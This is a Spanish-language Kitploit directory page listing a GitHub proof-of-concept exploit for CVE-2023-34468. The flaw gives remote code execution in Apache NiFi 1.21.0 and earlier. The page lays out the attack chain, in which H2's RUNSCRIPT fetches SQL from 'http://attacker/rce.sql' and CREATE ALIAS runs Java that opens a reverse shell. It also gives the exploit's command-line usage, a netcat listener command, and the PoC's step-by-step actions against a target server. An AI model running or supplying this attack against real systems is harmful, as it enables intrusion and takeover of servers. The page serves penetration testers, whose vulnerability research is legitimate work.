Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-34468-POC — PoC exploit para CVE-2023-34468 — RCE mediante H2 RUNSCRIPT en Apache NiFi <= 1.21.0 | Kitploit
Herramientas/GitHubGitHub/sbouabid-sec/cve-2023-34468-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubsbouabid-sec/cve-2023-34468-poc

CVE-2023-34468-POC

PoC exploit para CVE-2023-34468 — RCE mediante H2 RUNSCRIPT en Apache NiFi <= 1.21.0

Ver Repositorio
42hace 4 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-34468 — Apache NiFi 1.21.0 RCE PoC

Ejecución remota de código mediante RUNSCRIPT de la base de datos H2 en Apache NiFi <= 1.21.0


Vulnerabilidad

Apache NiFi incluye un JAR de la base de datos H2 de forma predeterminada. El servicio controlador DBCPConnectionPool puede configurarse para usar este controlador H2. H2 admite una declaración RUNSCRIPT que obtiene y ejecuta un archivo SQL desde una URL remota. Ese archivo SQL puede definir código Java arbitrario mediante CREATE ALIAS y ejecutarlo en el sistema operativo del servidor.

Cadena de ataque:

root@kitploit:~
DBCPConnectionPool (H2 driver)
    → ExecuteSQL processor
        → RUNSCRIPT FROM http://attacker/rce.sql
            → CREATE ALIAS (Java method)
                → CALL SHELLEXEC (reverse shell)

Versiones afectadas

SoftwareVersión
Apache NiFi<= 1.21.0
Corregido en1.21.1+
JavaCualquiera (incluido)

Requisitos

  • Python 3.x
  • Librería requests → pip install requests
  • Objetivo NiFi con acceso de escritura anónimo O credenciales válidas
  • Acceso de red desde el objetivo a tu máquina (para el callback del reverse shell)

Uso

root@kitploit:~
python3 poc.py --target http://NiFi.target.com \
               --lhost 10.10.10.10 \
               --lport 4444 \
               --http-port 80 \
               --cleanup

Argumentos

ArgumentoPor defectoDescripción
--targethttp://NiFi.target.comURL base del NiFi objetivo
--lhost10.10.10.10Tu IP (tun0)
--lport4444Puerto del listener del reverse shell
--http-port80Puerto para servir rce.sql
--cleanupFalseEliminar artefactos creados tras la ejecución

Configuración

Terminal 1 — listener:

root@kitploit:~
nc -lvnp 4444

Terminal 2 — exploit:

root@kitploit:~
python3 poc.py --target http://NiFi.target.com --lhost 10.10.10.10 --lport 4444 --cleanup

Qué hace el PoC

root@kitploit:~
Step 1  Check anonymous access and write permissions
Step 2  Get root Process Group ID
Step 3  Create malicious DBCPConnectionPool controller service
Step 4  Enable the controller service (handles revision versioning)
Step 5  Create ExecuteSQL processor pointing to rce.sql on our HTTP server
Step 6  Start the processor → NiFi fetches rce.sql → shell callback
Step 7  Cleanup (if --cleanup flag is set)
Descargar herramienta